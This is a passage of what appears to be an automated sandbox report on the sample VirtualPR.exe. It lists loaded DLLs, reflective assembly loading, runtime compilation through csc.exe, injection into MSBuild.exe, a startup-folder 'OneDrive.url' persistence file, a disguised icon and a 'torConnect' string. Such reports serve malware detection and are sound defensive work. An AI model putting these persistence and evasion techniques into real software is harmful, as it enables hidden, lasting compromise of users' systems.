                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wsock32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: avifil32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msvfw32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmmbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmmbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptui.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: pstorec.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: propsys.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\Desktop\VirtualPR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: VirtualPR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: VirtualPR.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: VirtualPR.exeStatic file information: File size 2715648 > 1048576
                  Source: VirtualPR.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x28a200
                  Source: VirtualPR.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: VirtualPR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: q:C:\Users\user\AppData\Local\Temp\wbuje1zp\wbuje1zp.pdb source: VirtualPR.exe, 00000000.00000002.2192138622.00000000030C1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: q1C:\Users\user\AppData\Local\Temp\doceyppt.pdb source: VirtualPR.exe, 0000000E.00000002.2378486056.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: q:C:\Users\user\AppData\Local\Temp\saruzovf\saruzovf.pdb source: VirtualPR.exe, 00000000.00000002.2192138622.000000000364D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: q1C:\Users\user\AppData\Local\Temp\ouz2pkol.pdb source: VirtualPR.exe, 0000000E.00000002.2378486056.000000000346D000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Source: 0.2.VirtualPR.exe.4e01008.5.raw.unpack, ManagesModules.cs.Net Code: DataModule System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.VirtualPR.exe.5660000.7.raw.unpack, ManagesModules.cs.Net Code: DataModule System.Reflection.Assembly.Load(byte[])
                  Source: wbuje1zp.dll.2.dr, ManagesModules.cs.Net Code: DataModule System.Reflection.Assembly.Load(byte[])
                  Source: doceyppt.dll.15.dr, ManagesModules.cs.Net Code: DataModule System.Reflection.Assembly.Load(byte[])
                  Source: VirtualPR.exeStatic PE information: 0x9C2DAABE [Sat Jan 11 20:02:06 2053 UTC]
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wbuje1zp\wbuje1zp.cmdline"
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\saruzovf\saruzovf.cmdline"
                  Source: C:\Windows\Temp\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\doceyppt.cmdline"
                  Source: C:\Windows\Temp\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ouz2pkol.cmdline"
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wbuje1zp\wbuje1zp.cmdline"Jump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\saruzovf\saruzovf.cmdline"Jump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\doceyppt.cmdline"Jump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ouz2pkol.cmdline"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA75CC LoadLibraryA,GetProcAddress,NtQueryVirtualMemory,NtQueryVirtualMemory,22_2_03AA75CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0370A378 push ecx; mov dword ptr [esp], ecx12_2_0370A37C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0371B2A0 push 0371B2E2h; ret 12_2_0371B2DA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_037182A4 push ecx; mov dword ptr [esp], eax12_2_037182A5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_037470B4 push 03747111h; ret 12_2_03747109
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_03718B9C push 03718BF0h; ret 12_2_03718BE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_03748A4C push 03748B21h; ret 12_2_03748B19
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_03702988 push 03702A2Ch; ret 12_2_03702A24
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_03700E18 push 03700E50h; ret 12_2_03700E48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_03741DAC push 03741DEEh; ret 12_2_03741DE6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0370DC5C push 0370DC9Eh; ret 12_2_0370DC96
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_036C6C93 push esp; iretd 12_2_036C6C94
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038C83AC push 038C83EFh; ret 12_2_038C83E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038EB2CC push 038EB403h; ret 12_2_038EB3FB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0389C6A8 push 0389C6E0h; ret 12_2_0389C6D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038F2494 push 038F24CEh; ret 12_2_038F24C6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0389E80C push 0389E848h; ret 12_2_0389E840
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0389E810 push 0389E848h; ret 12_2_0389E840
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038AE834 push 038AE894h; ret 12_2_038AE88C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038C8844 push 038C8886h; ret 12_2_038C887E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_03897D98 push 03897DD0h; ret 12_2_03897DC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038FE000 push 038FE0DEh; ret 12_2_038FE0D6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038FF444 push 038FF48Bh; ret 12_2_038FF483
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038FE47C push 038FE519h; ret 12_2_038FE511
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0390078B push eax; ret 12_2_039007C9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038FEFA8 push 038FEFD5h; ret 12_2_038FEFCD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038FF3B0 push 038FF40Ah; ret 12_2_038FF402
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038FE748 push 038FE7E4h; ret 12_2_038FE7DC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038FEE04 push 038FEE6Ch; ret 12_2_038FEE64
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038FEE02 push 038FEE6Ch; ret 12_2_038FEE64
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038FE618 push 038FE679h; ret 12_2_038FE671
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038FF218 push 038FF24Ch; ret 12_2_038FF244
                  Source: VirtualPR.exe, TMzJDXlmumBwF.csHigh entropy of concatenated method names: 'tuLpubozADFJAigt', 'dDoMwxFhCe', 'ydslHEKYwQSqMjn', 'uhdbXQjcUUKFP', 'LvRPuwhOSYjbrDHKHUGl', 'XfLZkJNkXkpIPECjvvuHczg', 'eVDUSsVekKaAnuZUrV', 'oUScBLUhHAjoLptfveYLOGkaM', 'krQnKiSHZVnBQlLQrhlHmvk', 'vgqQaMjAsAuSagOiiiCRoYxdSvjU'
                  Source: VirtualPR.exe, Program.csHigh entropy of concatenated method names: 'xkVHeUjyRAqmlNIkAaCxmdIkPV', 'fJviEaAIvyeXAEqLgudWA', 'BjcMTpkQUAJaerOCgGCbHdzXN', 'dCijjAEuTpswNqQOubCbvaexOJck', 'KQeVQBlooZCf', 'ntaRHJPSJNxVRdy', 'RvuIUoTnCZVtMcgsAMy', 'yQyDvgcALZOTkjc', 'ANqkaypgdedo', 'mDcjahzyindIBNTGeNbkPLDztAVfz'
                  Source: VirtualPR.exe, azNAOIvxfgGclrZUrqC.csHigh entropy of concatenated method names: 'hVnexrBRpHpoYXYSL', 'EvepzQSjKySFmQCUWx', 'YjGtilDgfjlikhRE', 'PajuzclPlg', 'REBudaeCfJNoJObdSMLEjNhAxCzvQ', 'TcBDJswkkL', 'jWYjHNjQfR', 'cbJvAzaRMC', 'kdDEIasCEImcSJcH', 'qCeykUhMSlIQgQddb'
                  Source: VirtualPR.exe, espyHmxjzsfquxSE.csHigh entropy of concatenated method names: 'JmduyRZFQtvDwp', 'BdLuSwWnyqz', 'BjOSLIGphiNXEkJdK', 'HsYVYIsXyqKHIgJNdXv', 'yWqGkSqfGPArbCOtqreaeWeSs', 'DmbZihdDdiceHjTbqAZBck', 'OYgomsBXxgYUwIxROQDDz', 'FSZBWSQGwKNwRkLFzgnBpv', 'IEvgqrOSycCUcXhrM', 'nYskaczOfscCjLrzZXCOlTeziu'
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\saruzovf\saruzovf.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ouz2pkol.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\wbuje1zp\wbuje1zp.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\doceyppt.dllJump to dropped file
                  Source: C:\Users\user\Desktop\VirtualPR.exePE file moved: C:\Windows\Temp\VirtualPR.exeJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.urlJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.urlJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (98).png
                  Source: VirtualPR.exe, 00000000.00000002.2202796339.00000000066C1000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 00000000.00000002.2214849304.00000000073F1000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 00000000.00000002.2202796339.00000000060C1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.4557432637.00000000037B5000.00000040.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2378527968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2388879028.00000000035E9000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: torConnect
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
